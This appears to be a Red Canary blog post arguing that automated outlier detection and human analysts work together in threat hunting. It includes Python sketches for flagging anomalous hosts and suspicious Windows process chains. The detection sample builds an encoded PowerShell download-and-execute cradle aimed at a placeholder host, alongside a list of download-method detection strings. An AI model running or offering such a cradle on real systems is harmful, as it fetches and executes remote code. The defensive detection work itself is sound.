There has been a fair amount of discussion (and disagreement) about the role of machines and automated threat hunting. It’s the endless debate of man vs machine—or, as I like to think of it, “AI vs AI.” You might wonder how man/machine is the same as AI/AI, but that’s pretty simple: one stands for “Artificial Intelligence” and the other is “Actual Intelligence.” Some might view this as a “John Henry” kind of scenario, where man must beat machine in order to survive, but I really don’t see this as a conflict—it’s more of a partnership.

Machines are great for automating things. After all, that’s why anyone who’s been working in technology for any serious length of time looks to build scripts to automate regular and repetitive tasks. But the machine can’t decide that a script is needed, build it, and run it all on its own; it needs a human to get the process started. And that’s because “Artificial Intelligence” is truly artificial. It can only “know” or “do” what has been programmed into it.



There’s a reason behind this Little Bobby strip:

What’s Required to Make Automated Threat Hunting Effective

We’re not going to go into all the ways that automation can be accomplished (methods of “teaching” your AI, for example), or all the potential risks and benefits. Suffice it to say that in general, in order for your AI to be effective, you must have a rather massive dataset to fuel it. For most companies, collecting and maintaining a dataset of that size is not realistic.

It is also fair to say that any automation you can do is going to benefit your human elements by reducing their workload. How many companies out there have an analyst team that is large enough to fully support their business, not overworked, and able to dedicate time to things outside the core competencies, such as threat hunting? Yes, in today’s environment, automation is a good thing.

Learn more about automation and other techniques to address the cybersecurity shortage: I Can’t Fill My Security Head Count. What Can I Do?

But here is the real crux of the biscuit: automation capabilities available via AI (Artificial Intelligence), while real and beneficial, are only possible up to a point. Past that point (and before it, really), you need to apply AI (Actual Intelligence) via human analysts. This was discussed at great length at the SANS Threat Hunting Summit in New Orleans. There seemed to be a fair amount of contention on the topic, but in the end the speakers were all saying the same thing: we need both.

Computers are very good at applying “logic.” After all, they work with ones and zeroes, and chips are essentially nothing but logic circuits. (All of this is at the very core of computer science.) The challenge is, there’s this little thing called “programming” that is required in order for the computer to know exactly how to apply its “logic.” The computer is not capable of creating detection and automation processes all on its own; it can only apply the algorithms it is given (by a human) to work with.

With sufficient data, a computer can leverage algorithms to identify outliers and edge cases much more rapidly than a human can, but that’s the extent of its capabilities. It cannot determine whether an outlier is good or bad. The human brain is extremely adept at identifying patterns, which is great for threat hunting, and by combining logic, experience, and intuition (that gut feeling that good detectives cultivate when things look like they fit a pattern but something isn’t quite right) it’s able to pick up where the machine leaves off, to make that final determination.
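To make that division of labor concrete, here is a minimal sketch of the machine's half of the job. It assumes a made-up metric (outbound connections per host) and hypothetical host names, and it uses a modified z-score based on the median, which is just one of many ways to find outliers. Notice what it returns: a list of things worth a look, not a verdict.

```python
from statistics import median

def flag_outliers(counts, threshold=3.5):
    """Return the keys whose value sits far from the median.

    Uses the modified z-score (0.6745 * |x - median| / MAD).
    The 3.5 cutoff is a common rule of thumb, not a tuned value.
    """
    values = list(counts.values())
    med = median(values)
    mad = median(abs(v - med) for v in values)  # median absolute deviation
    if mad == 0:
        # Every "typical" value is identical; anything different stands out.
        return [k for k, v in counts.items() if v != med]
    return [k for k, v in counts.items()
            if 0.6745 * abs(v - med) / mad > threshold]

# Hypothetical data: outbound connections per workstation in one hour.
connections = {
    "ws-01": 40, "ws-02": 42, "ws-03": 38,
    "ws-04": 41, "ws-05": 39, "ws-06": 400,
}

# The machine can say ws-06 is unusual. It cannot say whether ws-06 is
# running a backup job or beaconing to an attacker; that call is the analyst's.
print(flag_outliers(connections))  # ['ws-06']
```

The flagged host goes into an analyst's queue. Whether it turns out to be good or bad is exactly the determination the paragraph above leaves to the human.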

Continuous Threat Hunting

Another interesting takeaway from the SANS Threat Hunting Summit was that if you think you’re doing “continuous threat hunting,” what that really means is “monitoring.” But what if your “continuous” process is one geared toward improvement? Use available automation to reduce human constraints, and use your human efforts to “hunt” new things to feed back into the machine. Lather, rinse, repeat. This way your “AI” keeps “learning” on its path to self-awareness, and then it gets to do more heavy lifting for the analysts so that they can keep finding more bad stuff.

Learn more about how to apply a systemic approach to threat hunting

To briefly illustrate the point of man vs machine, if you had a chain of execution in Windows that involved cmd, mshta, wscript, and PowerShell, would it be legitimate, potentially unwanted, or malicious? What if the PowerShell contained encoded strings? Or a download method? Patterns of behavior are there which can be identified as “interesting” by automated processes, but in many cases it’s the human mind, with its ability to apply experienced reasoning, that is able to determine “good” from “bad.” And what about when “new” stuff comes out, like the recent Shadow Brokers code dump? Human analysts are absolutely at the core of research, testing, and figuring out new ways to detect interesting events.
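Here is a rough sketch of what the automated half of that example might look like. Everything in it is an assumption for illustration: the input shape (a list of process name and command line pairs, parent first), the function name `triage`, the short list of download markers, and the handful of spellings of the PowerShell encoded-command flag it recognizes. It is not how any particular product works, and a real detector would need far more coverage.

```python
import base64
import re

# Script hosts named in the example above.
SCRIPT_HOSTS = {"cmd.exe", "mshta.exe", "wscript.exe", "powershell.exe"}

# Matches a few common spellings only: -e, -ec, -enc, -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")

# A small, non-exhaustive set of strings that suggest a download.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                    "invoke-webrequest", "start-bitstransfer")

def triage(chain):
    """Return reasons a process chain is 'interesting' (empty list if none).

    chain: list of (image_name, command_line) tuples, parent first.
    """
    reasons = []
    hosts = [name.lower() for name, _ in chain if name.lower() in SCRIPT_HOSTS]
    if len(set(hosts)) >= 3:
        reasons.append("multiple script hosts in one chain: " + " > ".join(hosts))
    for name, cmdline in chain:
        if name.lower() != "powershell.exe":
            continue
        text = cmdline
        match = ENCODED_FLAG.search(cmdline)
        if match:
            reasons.append("PowerShell encoded command")
            try:
                # Encoded commands are Base64 over UTF-16LE text.
                decoded = base64.b64decode(match.group(1))
                text += " " + decoded.decode("utf-16-le", errors="replace")
            except ValueError:
                pass  # not valid Base64; keep the raw command line only
        if any(marker in text.lower() for marker in DOWNLOAD_MARKERS):
            reasons.append("PowerShell download method")
    return reasons

# Hypothetical chain built for the example; example.invalid is a placeholder.
script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
payload = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
suspicious = [
    ("cmd.exe", "cmd /c mshta launcher.hta"),
    ("mshta.exe", "mshta launcher.hta"),
    ("wscript.exe", "wscript stage.js"),
    ("powershell.exe", "powershell -nop -enc " + payload),
]
for reason in triage(suspicious):
    print(reason)
```

The function only lists reasons; it never says “malicious.” An administrator's deployment script can trip the same rules, which is why the output lands in front of an analyst rather than triggering a block on its own.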

This is essentially the approach we take at Red Canary, so that we drive operational improvements as well, and present more timely and accurate information to our customers. But that’s why we exist as a business, and what we’re focused on from a “People, Process, and Technology” standpoint. If you’re just starting out on your threat hunting journey, or are unclear how you could possibly do such a thing for yourself, check out my recent threat hunting webinar with SANS, in which I presented actionable ideas about how you can begin to hunt for threats in your own organization. Red Canary also has a slew of helpful resources that you can check out below. Happy hunting!